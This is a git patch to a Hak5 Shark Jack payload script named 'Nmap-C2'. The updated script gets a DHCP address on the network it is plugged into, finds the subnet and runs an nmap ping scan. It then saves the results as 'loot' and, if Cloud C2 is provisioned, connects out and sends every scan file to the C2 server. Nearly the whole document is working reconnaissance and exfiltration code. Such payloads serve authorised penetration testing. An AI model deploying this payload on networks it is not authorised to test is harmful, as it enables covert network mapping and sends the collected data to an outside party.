From 205b13abb4f7e0992ce0abc29d3b62967f3a6c0f Mon Sep 17 00:00:00 2001
From: Darren Kitchen <darren@hak5.org>
Date: Tue, 14 Jul 2020 08:48:38 -0700
Subject: [PATCH] Update payload.sh

---
 payloads/library/recon/Nmap-C2/payload.sh | 133 ++++++----------------
 1 file changed, 34 insertions(+), 99 deletions(-)

diff --git a/payloads/library/recon/Nmap-C2/payload.sh b/payloads/library/recon/Nmap-C2/payload.sh
index f41f2df..c9cad9b 100644
--- a/payloads/library/recon/Nmap-C2/payload.sh
+++ b/payloads/library/recon/Nmap-C2/payload.sh
@@ -2,7 +2,7 @@
 #
 # Title:         Nmap Payload for Shark Jack w/ C2
 # Author:        Hak5 (modifications from REDD)
-# Version:       1.0
+# Version:       1.1
 #
 # All credit goes to Hak5 Team. I just through in a simple check for if
 # C2 is provisioned in the SharkJack. - If so, exfiltrate! 
@@ -10,110 +10,45 @@
 # Scans target subnet with Nmap using specified options. Saves each scan result
 # to loot storage folder. Exfiltrates all scans to C2 if provisioned.
 #
-# Red ...........Setup
-# Amber..........Scanning
-# White..........Exfiltrating to C2
-# Green..........Finished
+# LED SETUP ... Obtaining IP address from DHCP
+# LED ATTACK ... Scanning
+# LED FINISH ... Scan Complete
 #
 # See nmap --help for options. Default "-sP" ping scans the address space for
 # fast host discovery.
 
 C2PROVISION="/etc/device.config"
-NMAP_OPTIONS="-sP"
+NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
 LOOT_DIR=/root/loot/nmap
-SCAN_DIR=/etc/shark/nmap
 
+# Setup loot directory, DHCP client, and determine subnet
+LED SETUP                            
+mkdir -p $LOOT_DIR                           
+COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
+NETMODE DHCP_CLIENT                          
+while [ -z "$SUBNET" ]; do  
+  sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
+done                                                                                                                                                    
+                                                                                                                                                        
+# Scan network                                                                                                                                          
+LED ATTACK    
+nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt
 
+# Exfiltrate Loot to Cloud C2
+if [[ -f "$C2PROVISION" ]]; then
+  LED SPECIAL
+  # Connect to Cloud C2
+  C2CONNECT
+  # Wait until Cloud C2 connection is established
+  while ! pgrep cc-client; do sleep 1; done
+  # Exfiltrate all test loot files
+  FILES="$LOOT_DIR/*.txt"
+  for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
+else
+  # Exit script if not provisioned for C2
+  LED R SOLID
+  exit 1
+fi
 
-function finish() {
-
-	LED CLEANUP
-	# Kill Nmap
-	wait $1
-	kill $1 &> /dev/null
-
-	# Sync filesystem
-	echo $SCAN_M > $SCAN_FILE
-	sync
-	sleep 1
-
-	# C2 Connect and send files
-	if [[ -f "$C2PROVISION" ]]; then
-		LED W FAST
-		c2_connect
-		sleep 1
-	fi
-
-	LED FINISH
-	sleep 1
-
-	# Halt system
-	halt
-}
-
-function setup() {
-	LED SETUP
-	# Create loot directory
-	mkdir -p $LOOT_DIR &> /dev/null
-	
-	# Set NETMODE to DHCP_CLIENT for Shark Jack v1.1.0+
-	NETMODE DHCP_CLIENT
-	# Wait for an IP address to be obtained - Blink cyan while waiting for IP
-	while ! ifconfig eth0 | grep "inet addr"; do sleep 1;LED C SOLID;sleep .1;LED SETUP; done
-
-	# Create tmp scan directory
-	mkdir -p $SCAN_DIR &> /dev/null
-
-	# Create tmp scan file if it doesn't exist
-	SCAN_FILE=$SCAN_DIR/scan-count
-	if [ ! -f $SCAN_FILE ]; then
-		touch $SCAN_FILE && echo 0 > $SCAN_FILE
-	fi
-
-	i=0
-	# Find IP address and subnet
-	while [ -z "$SUBNET" ]; do
-		sleep 1 && find_subnet
-	done
-}
-
-function find_subnet() {
-	SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
-}
-
-function c2_connect() {
-	if [[ -f "$C2PROVISION" ]]; then
-		# Connect to Cloud C2
-		C2CONNECT
-
-		# Wait until Cloud C2 connection is established
-		while ! pgrep cc-client; do sleep 1; done
-
-		# Exfiltrate all test loot files
-		FILES="$LOOT_DIR/*.txt"
-		for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Example; done
-	else
-		# Exit script if not provisioned for C2
-		LED R SOLID
-		exit 1
-	fi
-}
-
-function run() {
-	# Run setup
-	setup
-
-	SCAN_N=$(cat $SCAN_FILE)
-	SCAN_M=$(( $SCAN_N + 1 ))
-
-	LED ATTACK
-	# Start scan
-	nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$SCAN_M.txt &>/dev/null &
-	tpid=$!
-
-	finish $tpid
-}
-
-
-# Run payload
-run &
+LED FINISH                                                                          
+sleep 2 && halt